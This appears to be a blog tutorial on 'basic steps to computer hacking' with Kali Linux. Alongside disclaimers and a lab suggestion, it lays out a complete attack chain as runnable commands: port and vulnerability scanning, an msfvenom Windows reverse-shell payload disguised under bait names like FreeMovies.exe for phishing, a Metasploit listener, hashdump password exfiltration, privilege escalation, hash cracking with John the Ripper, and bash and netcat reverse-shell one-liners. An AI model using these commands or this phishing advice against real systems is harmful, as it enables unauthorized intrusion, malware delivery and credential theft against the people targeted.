Basic Steps to Computer Hacking
Introduction
This guide is all about computer hacking, and how the cyber criminals gain access to our systems. Basically, to hack into any computer, we need to find a weakness. We find weaknesses by scanning the system for vulnerabilities. Once vulnerabilities are found they can be researched and then exploited. In this Ethical hacking guide, we will be using the Kali Linux operating system and any steps provided will be explained using Kali.
Disclaimer: This guide will layout the basic steps to hacking computer systems for educational purposes only and is in no way meant to be used for criminal activities.
In this guide we cover:
- Kali Linux.
- Scanning Targets.
- Finding Exploits.
- Creating Payloads.
- Exfiltrating Passwords.
What is Kali Linux?
Kali Linux is a popular and powerful open-source operating system that is specifically designed for penetration testing, digital forensics, and cybersecurity-related tasks. It is based on Debian, one of the most widely used Linux distributions, and is maintained and funded by Offensive Security, a cybersecurity training company. Here are some key aspects of Kali Linux:
-
Penetration Testing: Kali Linux is widely used by cybersecurity professionals, ethical hackers, and penetration testers for assessing the security of computer systems and networks. It comes preloaded with a wide range of security tools and utilities for various purposes, including network scanning, vulnerability assessment, and exploiting security weaknesses.
-
Open Source: Kali Linux is free and open-source software, which means that anyone can download, use, and modify it, subject to its licensing terms.
-
Security Tools: It offers a vast collection of pre-installed security tools, including tools for password cracking, network analysis, web application testing, wireless network analysis, and more. Some well-known tools included in Kali Linux are Metasploit, Nmap, Wireshark, and Aircrack-ng.
-
Regular Updates: Kali Linux is actively maintained and updated, ensuring that security professionals have access to the latest tools and features. Users can easily keep their installations up-to-date using the package management system.
-
Customization: Kali Linux allows users to customize their installations by adding or removing tools according to their specific needs, making it a versatile platform for various cybersecurity tasks.
-
Documentation and Community: Kali Linux has a robust community and official documentation, making it easy for users to get started and find help when needed. The community also offers forums, tutorials, and training resources.
-
Legal and Ethical Use: It’s important to note that Kali Linux is intended for legal and ethical use in security testing, research, and education. Unauthorized or unethical use of the tools on Kali Linux can lead to legal consequences.
Kali Linux is a valuable tool for cybersecurity professionals and enthusiasts who are committed to securing systems, identifying vulnerabilities, and understanding cybersecurity threats. It’s essential to use it responsibly and ethically in compliance with applicable laws and regulations.
How to Install Kali
To Install Kali Linux, you can follow our guide here: How to Install Kali
Scanning The Target
First, you need a target, we recommend you set up another system in your own home to practice against.
Only ever hack networks and systems you own or have explicit written permission to do so from the owner.
You need know the IP address of the target before you can scan their network. Once you have a target IP, you can ping the target to make sure it’s online or even existing.
For this guide we presume you already have the targets IP.
The IP would usually look something like 96.157.186.18 but if you are targeting a system inside your own network, it will look something like 192.168.0.1 or 10.0.0.1.
Open your Kali Terminal and type:
ping <IP>
If you get a response, you know the system is online and available. Now we can begin scanning.
We need to find any information on open ports and the services running on those ports.
Nmap
Nmap, short for “Network Mapper,” is a widely used open-source network scanning tool and security scanner. It’s designed to help network administrators and security professionals discover and analyze network hosts, services, and potential vulnerabilities. Nmap provides valuable information for network management, security assessment, and troubleshooting.
Here are some key features and functions of Nmap:
-
Network Discovery: Nmap can be used to discover devices and hosts on a network. It sends packets to target IP addresses and analyzes the responses to determine which hosts are online.
-
Port Scanning: Nmap can scan and identify open and closed ports on a host. This information is crucial for understanding the services that are running on a system.
-
Service Detection: Nmap can often identify the services and applications running on open ports. This helps administrators understand the software and versions in use, which is valuable for security assessments.
-
Operating System Detection: Nmap can sometimes determine the operating system of a target host based on various characteristics of network responses. This can be helpful for network profiling.
-
Scripting and Automation: Nmap allows users to write custom scripts using the Nmap Scripting Engine (NSE) to perform specific tasks, such as vulnerability scanning, banner grabbing, and more.
-
Vulnerability Scanning: While Nmap itself is not a vulnerability scanner, it can be used as a starting point for identifying potential vulnerabilities. By knowing which services and versions are running on a system, administrators can cross-reference this information with known vulnerabilities.
-
Output Formats: Nmap provides various output formats, including text, XML, and even interactive graphical interfaces, making it versatile for different user needs.
-
Flexibility: Nmap is highly configurable and can be used in a variety of ways, from simple network discovery to complex security assessments.
Nmap is a powerful tool, but it’s important to use it responsibly and within the boundaries of the law and acceptable use policies.
Unauthorized or unethical use of Nmap for scanning networks or systems that you do not own or have permission to scan can lead to legal consequences.
Type the following command in the Kali terminal, replace <IP> with the targets IP:
sudo nmap -p- -sV -sC <IP>
Command Breakdown
-p-To scan all ports-sVTo List all services running on those ports-sCTo run all default scripts
Some more useful scan operators include:
-sTFor a TCP scan (TCP is Transport Control Protocol)-sUFor a UDP scan (UDP is User Datagram Protocol)-sSFor a SYN scan (Also known as a stealth scan)
These scans can take a long time take a break and grab a cup of Coffee while you wait.
Once any scan finishes You should always take notes of the output results. Most important to note is the services and open ports but anything else that looks interesting should be noted.
You can automatically send the data to a text file using the >> (append) operator. For example:
sudo nmap -p- -sV -sC 192.168.0.1 >> nmapScan.txt
Finding Known Vulnerabilities
We can utilize Nmap to scan for vulnerabilities too. In terminal type:
sudo nmap <IP> --script=vuln
If lucky, you will have detected some vulnerabilities. Nmap kindly gives corresponding CVE-000-00 numbers, making it easier to research detected vulnerabilities.
Note this information down and go to https://www.exploit-db.com to do your own research on how to exploit them. If unsuccessful we can try a different vulnerability scanner.
In terminal type:
nuclei help
If Nuclei is installed, we should see some help pages.
If Nuclei is not installed, we can install it using the following command:
sudo apt install nuclei
Now with Nuclei installed we can begin our scan. In the terminal type:
nuclei -t nuclei-templates/network -u <IP>
Now you have detected a vulnerability look it up on https://www.exploit-db.com to research how to exploit it.
So, to wrap up…
- We scan the system.
- Find what services are using which ports.
- Research those services.
- Run vulnerability scanners to find exploits.
- Use those exploits to gain access to the system.
You can practice these techniques, and see instant results, you can attack operating systems like the Metasploitable. This is an operating system created with deliberate vulnerabilities to be exploited and is a great system to practice your hacking techniques against first. You can install the Metasploitable attack box to a Raspberry Pi or even to your Windows system using a hypervisor such as VirtualBox or VMware. If you don’t know about VirtualBox please read our guide on installing any operating system to VirtualBox.
Attack Boxes
“Attack boxes” is a term used in cybersecurity to refer to computer systems or environments that are intentionally set up and configured for offensive security testing, including penetration testing, ethical hacking, and vulnerability assessment. These systems are used by cybersecurity professionals and ethical hackers to simulate real-world attack scenarios and to assess the security of networks, applications, and infrastructure.
Some Attack Boxes are themed and can be great fun, and a great way to practice and learn new techniques. I highly recommend the Mr. Robot box to start with, it’s not too complicated and tons of nostalgic fun if you’re a fan of the show.
You can find Attack Boxes to practice with at these sites below:
Phishing for Access
With the use of social engineering and phishing we can trick the target into giving us access. We can embed malicious code into a seemingly innocent file like a .pdf or .exe this is known as a payload. Once the target opens the payload, a connection is made back to our own system, giving us backdoor access to theirs.
The name of the payload can be important, it should be enticing to the target in mind. Maybe the target streams movies online, then you should name the payload something like FreeMovies.exe, as I said the name depends on the target you are trying to attack.
You can even create a simple website to host the payloads and fool the target into installing the payload.
Some examples of payload names could be:
- FreeMovies
- FreeMusic
- FreePorn
Creating The Executable Payload for Windows
In the terminal type:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=4321 -f exe > payloadX64.exe
Make sure to replace <Your_IP> with your own IP. You can change the LPORT if you wish but it’s not necessary, but you will need to remember the port number.
After you run this command, the payload will be created almost instantly. This payload is designed for Windows 64-bit systems, if you needed it for 32-bit systems you can use x86 instead of x64.
That’s it, the Payload has been created go locate where it was saved and keep it somewhere safe for now.
Hosting The Payload
The payload needs to be made available online, so it is accessible to the target. You can host it directly from your Kali machine or anywhere you like.
To host from your Kali machine, you need to start a http webserver on your system, open terminal and type:
systemctl start apache2.service
Now we need to move the payload to the html directory. In the terminal navigate to where your payload is stored and type the following command:
sudo mv payloadX64.exe /var/www/html
That’s it! The payload is now available online via port 80 (HTTP port). Now it’s down to you how you get it onto the target machine.
Before the target opens the payload, you will need to have your listener terminal open and waiting. Open a new terminal which will be used specifically for the listener and type the following commmands:
msfconsole
Starts the Metasploit program.
use multi/handler
multi/handler is the module we need use.
set payload windows/x64/meterpreter/reverse_tcp
You set the correct payload for the one we created previously.
show options
You show options to see what necessary settings are required.
set LHOST <Your_IP>
You set LHOST to your own IP.
set LPORT 4321
You set LPORT to the port set within the payload.
show options
You show options again to make sure your settings are correct.
run
Finally, you run the listener.
Once the target opens the payload the listener window will receive a reverse connection back to the targets system, and you will finally have access.
Exfiltrating Password Credentials
Now, hopefully we’re in the target system we can start looking around. One thing we can do while being in the targets system is to exfiltrate passwords.
To exfiltrate passwords, run these following commands in the listener window:
use post/gather/hashdump
set SESSION 1
run -j
Access denied? then you need to try migrating to another service. In meterpreter window run these commands:
ps
migrate <PID>
Migrating to the windows explorer.exe process is a good option and will provide better stability for your connection incase the target close’s the payload they opened.
We can even use Metasploit to suggest vulnerabilities to escalate our level of access, this is called privilege escalation.
In meterpreter window run these commands:
background
use post/multi/recon/local_exploit_suggester
show options
set SESSION 1
run -j
<IP>
Note chosen vulnerability and run the following commands in meterpreter window, replacing “Vulnerability” with your chosen vulnerability.
use "Vulnerability"
set SESSION 1
run -j
sessions
use post/windows/gather/hashdump
show options
set SESSION 2
run
If successful, copy the entire password output to a file called tobecracked.txt.
Cracking The Password Database
Now you have the password hashes they need to be cracked. To crack these passwords, we can utilize a tool called John the Ripper. John the Ripper is a great password cracking tool and you can learn more about using this tool in our guide here: John the Ripper
Open another terminal (leave listener terminal open) and type in the new terminal window:
john --format=NT ./tobecracked.txt
Grab a cup of Coffee this could a long time. Once completed, type in Terminal:
john --format=NT ./tobecracked.txt --show
That’s it you should have the passwords displayed on your screen. Test the passwords by trying to log into a service such as SSH.
Other Reverse Shell Payloads
I’m not going to go into depth here, but I will give you some more examples:
Bash Reverse Shell payload
Create a file called shell.sh and enter the following code to the file:
bash -i >& /dev/tcp/"Your_IP"/4321 0>&1
Same as before, this needs to be activated on the target machine. You don’t need to use Metasploit every time you need a listener you could also use Netcat.
Open a new terminal type:
nc -lvp 4321
That’s it, the listener is waiting for a reverse connection back to it.
Netcat Reverse Shell
If the target has Netcat installed, gaining access is very simple. You need to open a listener terminal, this time we will use Netcat for the listener, to do so type the following command:
nc -lvp 4321
You can now run the following command on the targets system:
nc -e /bin/sh <Your_IP> 4321
That’s it, this is the end of our hacking systems guide
Conclusion
While this post has provided an overview of the fundamental steps involved in hacking computer systems, it is crucial to emphasize that the information presented here is meant for educational and defensive purposes only. Ethical hacking and cybersecurity are essential practices for safeguarding digital infrastructure and protecting against malicious actors.
Understanding the methods employed by potential attackers, as outlined in this post, equips security professionals and organizations with the knowledge to proactively defend against cyber threats. By employing these techniques in ethical hacking and penetration testing, security experts can identify vulnerabilities and address them before they can be exploited by malicious hackers.
Remember that engaging in unauthorized or malicious hacking activities is not only illegal but also unethical. It is of utmost importance to always obtain proper authorization and adhere to legal and ethical standards when assessing the security of computer systems.
Stay on the right side of the law guys.
Happy Hacking!
Ethical Hacking Guides
We have many guides to help you on your journey into the world of Ethical Hacking. If this is something you find interesting, please take a look here today: Ethical Hacking Guides.
Recommendation:
ALFA Network Wi-Fi Adapter: https://amzn.to/3QbZ6AE
This Wi-Fi adapter is essential if you are to learn Wi-Fi Hacking.
